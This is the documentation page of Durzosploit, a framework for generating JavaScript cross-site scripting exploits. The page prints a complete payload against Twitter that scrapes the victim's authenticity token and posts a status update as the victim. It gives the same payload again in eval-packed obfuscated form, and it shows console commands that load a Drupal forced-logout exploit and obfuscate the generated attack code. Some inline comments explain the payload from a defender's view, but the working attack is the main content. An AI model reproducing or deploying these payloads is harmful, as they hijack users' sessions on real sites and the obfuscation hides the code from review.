Durzosploit Introduction
Durzosploit is a JavaScript exploit-generator framework that works through the console. The goal of the project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites.
Durzosploit does not find browser vulnerabilities; it is only a framework containing exploits you can use.
Installation
The best way to install Durzosploit is through its SVN repository, because that is where you will get all the latest updates and exploits. Otherwise, grab an archived copy from our website.
The only thing you need to use Durzosploit is Ruby.
A Quick How-to
Before obfuscation:
/**
 * Minimal XMLHttpRequest wrapper, as it appears in the page's listing.
 *
 * Tries the two legacy ActiveX XMLHTTP objects before the native
 * XMLHttpRequest (old-IE-first order), opens the request asynchronously and
 * calls fnDone(responseText) once readyState reaches 4.
 *
 * @param {string} sURL    request path; for GET the query string is appended to it
 * @param {string} sMethod HTTP method, upper-cased before use
 * @param {string} sVars   url-encoded body (POST) or query string (GET)
 * @param {function} [fnDone] callback receiving xmlhttp.responseText
 * @returns {null|boolean} null when no XHR implementation could be created,
 *   false when open()/send() threw, true once send() was issued. Both callers
 *   in this file invoke it with `new`, so the return value is discarded.
 */
function XHRRequest(sURL, sMethod, sVars, fnDone) {
  var xmlhttp, bComplete = false;
  try {
    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
    try {
      xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (e) {
      try {
        xmlhttp = new XMLHttpRequest();
      } catch (e) {
        xmlhttp = false;
      }
    }
  }
  if (!xmlhttp) return null;
  sMethod = sMethod.toUpperCase();
  try {
    if (sMethod == "GET") {
      // The "?" is appended unconditionally, so an empty sVars still yields "sURL?".
      xmlhttp.open(sMethod, sURL+"?"+sVars, true);
      sVars = "";
    } else {
      xmlhttp.open(sMethod, sURL, true);
      // "Method" is not a standard request header. It is sent as a custom
      // header and is therefore a server-side fingerprint of this wrapper
      // (presumably; depends on the browser honouring setRequestHeader for it).
      xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
      xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    }
    xmlhttp.onreadystatechange = function(){
      // Fires on any readyState 4 regardless of HTTP status; bComplete keeps
      // fnDone from running more than once.
      if (xmlhttp.readyState == 4 && !bComplete) {
        bComplete = true;
        if(fnDone) fnDone(xmlhttp.responseText);
      }
    };
    xmlhttp.send(sVars);
  } catch(e) {
    return false;
  }
  return true;
}

/**
 * Form-style URL encoding built on encodeURIComponent.
 *
 * encodeURIComponent leaves ' ( ) * ~ ! unescaped; this function percent-encodes
 * those as well, turns "%20" into "+", and finally upper-cases any lowercase
 * hex escape that is left.
 *
 * @param {*} str value converted with toString() before encoding
 * @returns {string} the encoded string
 */
function urlencode(str) {
  // The outer tmp_arr is never used; replacer declares its own.
  var histogram = {}, tmp_arr = [];
  var ret = str.toString();
  // Literal (non-regex) replace-all via split/join.
  var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
  };
  histogram["'"] = '%27';
  histogram['('] = '%28';
  histogram[')'] = '%29';
  histogram['*'] = '%2A';
  histogram['~'] = '%7E';
  histogram['!'] = '%21';
  histogram['%20'] = '+';
  ret = encodeURIComponent(ret);
  // search and replace are never declared, so in this non-strict code the
  // loop creates them as implicit globals.
  for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret)
  }
  return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return "%"+m2.toUpperCase();
  });
  // Unreachable: the return above already exits the function.
  return ret;
}

/**
 * Example payload from the page (a same-origin status-update request).
 *
 * Defender's reading: it shows why a per-form anti-CSRF token alone does not
 * stop script that is already executing in the application's origin. run()
 * fetches a same-origin page, exploit() reads the token out of that HTML and
 * replays it in the POST. The remedy is removing the injection itself (output
 * encoding, CSP), since any in-origin script can read the token the same way.
 */
function twitter_update_status_exploit() {
  this.run = function() {
    // The GET response body is handed to this.exploit as responseText.
    new XHRRequest("/home", "GET", "", this.exploit);
  }
  this.exploit = function(responseText) {
    // authreg and updateEncode are undeclared and leak as globals.
    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(responseText);
    // exec() returns null when no token is present, so this line then throws a TypeError.
    authtoken = authtoken[1];
    updateEncode = urlencode("hello moto :)");
    // POST body carries the harvested token; XHRRequest adds the form Content-Type.
    new XHRRequest("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  }
}
// Runs as soon as the script is evaluated.
new twitter_update_status_exploit().run();
After obfuscation:
// Obfuscated form of the listing above (presumably produced with the "packr"
// obfuscator from the Obfuscators section). The leading function rebuilds the
// source from a base-62 keyword table (the c<62 / c%62 arithmetic) and the
// result is passed straight to eval(). For review or detection purposes the
// packed string is not inspectable as-is; running the decoder without the
// outer eval() recovers the plain listing.
eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[035-8k-wyzA-H]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 m(d,b,f,h){6 a,c=n;7{a=3 s("Msxml2.t")}8(e){7{a=3 s("Microsoft.t")}8(e){7{a=3 XMLHttpRequest()}8(e){a=n}}}k(!a)5 null;b=b.u();7{k(b=="v"){a.w(b,d+"?"+f,l);f=""}else{a.w(b,d,l);a.y("Method","z "+d+" HTTP/1.1");a.y("Content-Type","application/x-www-form-urlencoded")}a.onreadystatechange=0(){k(a.readyState==4&&!c){c=l;k(h)h(a.responseText)}};a.send(f)}8(e){5 n}5 l}0 A(a){6 c={},j=[];6 g=a.toString();6 i=0(d,b,f){6 h=[];h=f.split(d);5 h.join(b)};c["\'"]=\'%27\';c[\'(\']=\'%28\';c[\')\']=\'%29\';c[\'*\']=\'%2A\';c[\'~\']=\'%7E\';c[\'!\']=\'%21\';c[\'%20\']=\'+\';g=encodeURIComponent(g);for(o in c){p=c[o];g=i(o,p,g)}5 g.p(/(\\%([a-z0-9]{2}))/g,0(d,b,f){5"%"+f.u()});5 g}0 B(){q.C=0(){3 m("/D","v","",q.E)}q.E=0(d){F=3 RegExp(/twttr.form_authenticity_token = \'(.*)\';/g);6 b=F.exec(d);b=b[1];G=A("hello moto :)");3 m("/H/r","z","authenticity_token="+b+"&H="+G+"&tab=D&r=r")}}3 B().C();',[],44,'function|||new||return|var|try|catch||||||||||||if|true|XHRRequest|false|search|replace|this|update|ActiveXObject|XMLHTTP|toUpperCase|GET|open||setRequestHeader|POST|urlencode|twitter_update_status_exploit|run|home|exploit|authreg|updateEncode|status'.split('|'),0,{}))
Help
Managing your session
$ ruby durzosploit (dz) > session new example new project example added to session (dz) > session new example2 new project example2 added to session (dz) > session show [1] example * [2] example2 (dz) > session select 2 (dz) > session delete 1 exploit deleted (dz) > session show [1] example2 (dz) > session select 1 (dz) > session info session name: example2 Exploits loaded: Dependencies: (dz) > search exploits ... drupal/logout - Drupal 6.x - makes target logout (dz) > load drupal/logout Please fill out the parameters: Path_to_drupal [/]: (dz) > session info session name: example2 Exploits loaded: [1] => drupal/logout - Drupal 6.x - makes target logout Dependencies: [1] => XHRRequest.js (dz) >quit
Obfuscators
Durzosploit provides some obfuscators to automatically pack/minify your generated exploit:
(dz) > generate Your completed exploit can be found there output/example.js (dz) > search obfuscators packr - DeanEdward's packer minify - simple clean of the javascript code (dz) > obfuscate minify Successfuly packed project to output/example.ob.js with Minify (dz) > obfuscate packr Successfuly packed project to output/example.ob.js with Packr (dz) > obfuscate minify packr Successfuly packed project to output/example.ob.js with Minify Successfuly packed project to output/example.ob.js with Packr (dz) >


